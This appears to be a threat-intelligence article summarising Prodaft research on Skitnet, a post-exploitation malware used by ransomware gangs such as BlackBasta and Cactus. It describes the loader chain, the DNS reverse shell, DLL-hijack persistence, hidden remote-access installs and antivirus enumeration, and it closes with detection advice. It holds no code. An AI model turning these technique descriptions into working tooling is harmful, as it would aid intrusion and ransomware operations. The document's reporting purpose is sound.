Skitnet: A New Era in Ransomware Tools

Skitnet, also known as “Bossnet,” has emerged as a formidable tool in the arsenal of ransomware gangs, offering a blend of stealth and versatility that has captured the attention of cybercriminals worldwide. Initially surfacing on underground forums like RAMP in April 2024, Skitnet quickly gained traction among notorious groups such as BlackBasta and Cactus by early 2025. These groups have leveraged Skitnet’s capabilities in phishing attacks targeting enterprise platforms like Microsoft Teams, as detailed by Prodaft researchers. The malware’s sophisticated architecture, which includes a Rust-based loader and a ChaCha20 encrypted Nim binary, allows it to establish a robust communication channel with its command and control server, making it a potent tool for post-exploitation activities.

Skitnet: An Overview

Development and Deployment

Skitnet, also known as “Bossnet,” is a sophisticated post-exploitation malware increasingly adopted by ransomware gangs for its stealthy and versatile capabilities. Initially offered for sale on underground forums like RAMP in April 2024, Skitnet gained significant traction among cybercriminals by early 2025. According to Prodaft researchers, it has been deployed in real-world attacks by multiple ransomware operations, including BlackBasta and Cactus. These groups have utilized Skitnet in phishing attacks, notably targeting enterprise platforms such as Microsoft Teams.

Technical Architecture

Skitnet’s infection chain begins with a Rust-based loader that decrypts a ChaCha20 encrypted Nim binary, subsequently loading it into the target system’s memory. This Nim payload establishes a DNS-based reverse shell for communication with the command and control (C2) server. The malware initiates the session with randomized DNS queries, creating a robust and stealthy communication channel. It operates three concurrent threads: one for sending heartbeat DNS requests, another for monitoring and exfiltrating shell output, and a third for listening and decrypting commands from DNS responses. Commands and communications are sent via HTTP or DNS, depending on instructions issued through the Skitnet C2 control panel.

Command Capabilities

Skitnet’s admin panel supports a range of commands, enabling extensive control over compromised systems. Key functionalities include:

• Startup: Establishes persistence by downloading three files, including a malicious DLL, and creating a shortcut to a legitimate Asus executable (ISP.exe) in the Startup folder. This action triggers a DLL hijack, executing a PowerShell script (pas.ps1) for ongoing C2 communication.

• Screen: Captures screenshots of the victim’s desktop using PowerShell, uploads them to Imgur, and sends the image URL back to the C2 server.

• Anydesk and Rutserv: Downloads and silently installs AnyDesk and RUT-Serv, both legitimate remote access tools, while concealing their presence by hiding windows and notification tray icons.

• Shell: Initiates a PowerShell command loop, sending an initial “Shell started..” message. It then polls the server every five seconds for new commands, executing them using Invoke-Expression and sending results back.

• Av: Enumerates installed antivirus and security software by querying WMI (SELECT * FROM AntiVirusProduct in the root\SecurityCenter2 namespace) and sends results to the C2 server.

These capabilities make Skitnet a powerful tool for maintaining control over compromised systems, facilitating data exfiltration, and executing further malicious activities.

Skitnet’s .NET Loader

Beyond its core command set, Skitnet operators can leverage a separate capability involving a .NET loader. This feature allows the execution of PowerShell scripts in memory, providing even deeper attack customization. The use of a .NET loader enhances Skitnet’s versatility, enabling attackers to tailor their operations to specific targets and objectives.

Economic and Strategic Advantages

Skitnet offers several economic and strategic advantages to ransomware gangs. Custom tools tailored to specific operations are costly to develop and require skilled developers, who may not always be available, especially in lower-tier groups. In contrast, using an off-the-shelf malware like Skitnet is cheaper, quicker to deploy, and complicates attribution, as many threat actors use it. This makes Skitnet particularly enticing for hackers seeking to maximize their operational efficiency and minimize costs.

Indicators of Compromise (IoCs) and Mitigation

Prodaft has published indicators of compromise (IoCs) associated with Skitnet on its GitHub repository. These IoCs are crucial for cybersecurity professionals seeking to detect and mitigate Skitnet infections. Organizations are advised to monitor network traffic for unusual DNS queries, implement robust endpoint detection and response (EDR) solutions, and conduct regular security audits to identify potential vulnerabilities.

Ransomware Gangs and Skitnet

The adoption of Skitnet by ransomware gangs highlights its effectiveness as a post-exploitation tool. Groups like BlackBasta have utilized it in phishing attacks against enterprise platforms, demonstrating its utility in real-world scenarios. Skitnet’s ability to establish persistence, capture sensitive information, and facilitate remote access makes it a valuable asset for cybercriminals seeking to maximize the impact of their attacks.

Future Implications

The emergence of Skitnet marks a significant shift in the landscape of ransomware and post-exploitation tools. As cybercriminals continue to refine their tactics, techniques, and procedures (TTPs), organizations must remain vigilant and proactive in their cybersecurity efforts. The development and deployment of sophisticated malware like Skitnet highlight the need for continuous monitoring, threat intelligence sharing, and collaboration among cybersecurity professionals to effectively combat emerging threats.

In conclusion, Skitnet represents a significant advancement in post-exploitation malware, offering ransomware gangs a versatile and stealthy tool for maintaining control over compromised systems. Its adoption by prominent cybercriminal groups underscores its effectiveness and highlights the ongoing challenges faced by organizations in defending against sophisticated cyber threats.

Final Thoughts

The development of Skitnet underscores the dynamic and evolving nature of cyber threats. As ransomware gangs continue to refine their tactics, tools like Skitnet highlight the ongoing challenges faced by organizations in defending against sophisticated cyber threats. Its adoption by prominent cybercriminal groups such as BlackBasta demonstrates its effectiveness in real-world scenarios, emphasizing the need for continuous monitoring and proactive cybersecurity measures. The development of Skitnet and similar tools calls for enhanced collaboration among cybersecurity professionals to effectively combat these emerging threats. For more insights, refer to the detailed analysis by Prodaft researchers.

References

• Prodaft researchers. (2025). Ransomware gangs increasingly use Skitnet post-exploitation malware. BleepingComputer